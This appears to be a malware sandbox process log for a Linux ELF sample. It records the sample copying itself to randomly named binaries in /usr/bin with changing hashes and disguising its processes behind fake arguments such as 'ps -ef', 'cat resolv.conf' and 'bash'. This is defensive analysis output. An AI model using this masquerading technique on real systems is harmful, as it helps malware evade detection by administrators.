                                                                                                                                                                                    MD5 hash:a5394a1ee3b201dfd0198300b6604608

                                                                                                                                                                                    Start time (UTC):18:31:09
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:09
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:09
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/vapcvdizxx
                                                                                                                                                                                    Arguments:/usr/bin/vapcvdizxx su 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:a5394a1ee3b201dfd0198300b6604608

                                                                                                                                                                                    Start time (UTC):18:31:09
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/vapcvdizxx
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:a5394a1ee3b201dfd0198300b6604608

                                                                                                                                                                                    Start time (UTC):18:31:09
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:09
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:09
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/vapcvdizxx
                                                                                                                                                                                    Arguments:/usr/bin/vapcvdizxx "echo \"find\"" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:a5394a1ee3b201dfd0198300b6604608

                                                                                                                                                                                    Start time (UTC):18:31:09
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/vapcvdizxx
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:a5394a1ee3b201dfd0198300b6604608

                                                                                                                                                                                    Start time (UTC):18:31:09
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:09
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:09
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/vapcvdizxx
                                                                                                                                                                                    Arguments:/usr/bin/vapcvdizxx top 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:a5394a1ee3b201dfd0198300b6604608

                                                                                                                                                                                    Start time (UTC):18:31:09
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/vapcvdizxx
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:a5394a1ee3b201dfd0198300b6604608

                                                                                                                                                                                    Start time (UTC):18:31:15
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:15
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:15
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/lkzqkklpfr
                                                                                                                                                                                    Arguments:/usr/bin/lkzqkklpfr "cd /etc" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:26d5465cc1a2caff5bb4ee89004cbcae

                                                                                                                                                                                    Start time (UTC):18:31:15
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/lkzqkklpfr
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:26d5465cc1a2caff5bb4ee89004cbcae

                                                                                                                                                                                    Start time (UTC):18:31:15
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:15
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:15
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/lkzqkklpfr
                                                                                                                                                                                    Arguments:/usr/bin/lkzqkklpfr whoami 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:26d5465cc1a2caff5bb4ee89004cbcae

                                                                                                                                                                                    Start time (UTC):18:31:15
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/lkzqkklpfr
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:26d5465cc1a2caff5bb4ee89004cbcae

                                                                                                                                                                                    Start time (UTC):18:31:15
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:15
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:15
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/lkzqkklpfr
                                                                                                                                                                                    Arguments:/usr/bin/lkzqkklpfr who 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:26d5465cc1a2caff5bb4ee89004cbcae

                                                                                                                                                                                    Start time (UTC):18:31:15
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/lkzqkklpfr
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:26d5465cc1a2caff5bb4ee89004cbcae

                                                                                                                                                                                    Start time (UTC):18:31:15
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:15
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:15
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/lkzqkklpfr
                                                                                                                                                                                    Arguments:/usr/bin/lkzqkklpfr ifconfig 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:26d5465cc1a2caff5bb4ee89004cbcae

                                                                                                                                                                                    Start time (UTC):18:31:15
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/lkzqkklpfr
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:26d5465cc1a2caff5bb4ee89004cbcae

                                                                                                                                                                                    Start time (UTC):18:31:15
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:15
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:15
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/lkzqkklpfr
                                                                                                                                                                                    Arguments:/usr/bin/lkzqkklpfr "ls -la" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:26d5465cc1a2caff5bb4ee89004cbcae

                                                                                                                                                                                    Start time (UTC):18:31:15
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/lkzqkklpfr
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:26d5465cc1a2caff5bb4ee89004cbcae

                                                                                                                                                                                    Start time (UTC):18:31:20
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:20
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:20
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/cpbnjarskl
                                                                                                                                                                                    Arguments:/usr/bin/cpbnjarskl "ps -ef" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:bdf7e50117e6bb11039b3f114d7da203

                                                                                                                                                                                    Start time (UTC):18:31:20
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/cpbnjarskl
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:bdf7e50117e6bb11039b3f114d7da203

                                                                                                                                                                                    Start time (UTC):18:31:20
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:20
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:20
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/cpbnjarskl
                                                                                                                                                                                    Arguments:/usr/bin/cpbnjarskl who 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:bdf7e50117e6bb11039b3f114d7da203

                                                                                                                                                                                    Start time (UTC):18:31:20
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/cpbnjarskl
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:bdf7e50117e6bb11039b3f114d7da203

                                                                                                                                                                                    Start time (UTC):18:31:20
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:20
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:20
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/cpbnjarskl
                                                                                                                                                                                    Arguments:/usr/bin/cpbnjarskl bash 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:bdf7e50117e6bb11039b3f114d7da203

                                                                                                                                                                                    Start time (UTC):18:31:21
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/cpbnjarskl
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:bdf7e50117e6bb11039b3f114d7da203

                                                                                                                                                                                    Start time (UTC):18:31:21
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:21
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:21
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/cpbnjarskl
                                                                                                                                                                                    Arguments:/usr/bin/cpbnjarskl ls 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:bdf7e50117e6bb11039b3f114d7da203

                                                                                                                                                                                    Start time (UTC):18:31:21
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/cpbnjarskl
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:bdf7e50117e6bb11039b3f114d7da203

                                                                                                                                                                                    Start time (UTC):18:31:21
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:21
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:21
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/cpbnjarskl
                                                                                                                                                                                    Arguments:/usr/bin/cpbnjarskl id 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:bdf7e50117e6bb11039b3f114d7da203

                                                                                                                                                                                    Start time (UTC):18:31:21
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/cpbnjarskl
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:bdf7e50117e6bb11039b3f114d7da203

                                                                                                                                                                                    Start time (UTC):18:31:26
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:26
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:26
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/uaewjndswe
                                                                                                                                                                                    Arguments:/usr/bin/uaewjndswe "route -n" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:042d91770189023b9e7a41c9db18e788

                                                                                                                                                                                    Start time (UTC):18:31:26
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/uaewjndswe
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:042d91770189023b9e7a41c9db18e788

                                                                                                                                                                                    Start time (UTC):18:31:26
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:26
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:26
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/uaewjndswe
                                                                                                                                                                                    Arguments:/usr/bin/uaewjndswe id 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:042d91770189023b9e7a41c9db18e788

                                                                                                                                                                                    Start time (UTC):18:31:27
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/uaewjndswe
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:042d91770189023b9e7a41c9db18e788

                                                                                                                                                                                    Start time (UTC):18:31:27
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:27
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:27
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/uaewjndswe
                                                                                                                                                                                    Arguments:/usr/bin/uaewjndswe ifconfig 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:042d91770189023b9e7a41c9db18e788

                                                                                                                                                                                    Start time (UTC):18:31:27
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/uaewjndswe
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:042d91770189023b9e7a41c9db18e788

                                                                                                                                                                                    Start time (UTC):18:31:27
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:27
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:27
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/uaewjndswe
                                                                                                                                                                                    Arguments:/usr/bin/uaewjndswe "cd /etc" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:042d91770189023b9e7a41c9db18e788

                                                                                                                                                                                    Start time (UTC):18:31:27
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/uaewjndswe
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:042d91770189023b9e7a41c9db18e788

                                                                                                                                                                                    Start time (UTC):18:31:27
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:27
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:27
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/uaewjndswe
                                                                                                                                                                                    Arguments:/usr/bin/uaewjndswe uptime 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:042d91770189023b9e7a41c9db18e788

                                                                                                                                                                                    Start time (UTC):18:31:27
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/uaewjndswe
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:042d91770189023b9e7a41c9db18e788

                                                                                                                                                                                    Start time (UTC):18:31:32
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:32
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:32
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/efgdvbpuxx
                                                                                                                                                                                    Arguments:/usr/bin/efgdvbpuxx "cat resolv.conf" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:5adf54da233ddd71999a30ae5852d13e

                                                                                                                                                                                    Start time (UTC):18:31:32
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/efgdvbpuxx
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:5adf54da233ddd71999a30ae5852d13e

                                                                                                                                                                                    Start time (UTC):18:31:32
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:32
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:32
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/efgdvbpuxx
                                                                                                                                                                                    Arguments:/usr/bin/efgdvbpuxx pwd 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:5adf54da233ddd71999a30ae5852d13e

                                                                                                                                                                                    Start time (UTC):18:31:32
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/efgdvbpuxx
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:5adf54da233ddd71999a30ae5852d13e

                                                                                                                                                                                    Start time (UTC):18:31:32
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:32
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:32
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/efgdvbpuxx
                                                                                                                                                                                    Arguments:/usr/bin/efgdvbpuxx "ps -ef" 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:5adf54da233ddd71999a30ae5852d13e

                                                                                                                                                                                    Start time (UTC):18:31:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/efgdvbpuxx
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:5adf54da233ddd71999a30ae5852d13e

                                                                                                                                                                                    Start time (UTC):18:31:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/tmp/1.elf
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625867 bytes
                                                                                                                                                                                    MD5 hash:ff1a3683a5ad87f88858e92fbcf1ae57

                                                                                                                                                                                    Start time (UTC):18:31:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/efgdvbpuxx
                                                                                                                                                                                    Arguments:/usr/bin/efgdvbpuxx top 6205
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:5adf54da233ddd71999a30ae5852d13e

                                                                                                                                                                                    Start time (UTC):18:31:33
                                                                                                                                                                                    Start date (UTC):26/10/2023
                                                                                                                                                                                    Path:/usr/bin/efgdvbpuxx
                                                                                                                                                                                    Arguments:-
                                                                                                                                                                                    File size:625878 bytes
                                                                                                                                                                                    MD5 hash:5adf54da233ddd71999a30ae5852d13e

                                                                                                                                                                                    Start time (UTC):18:31:33
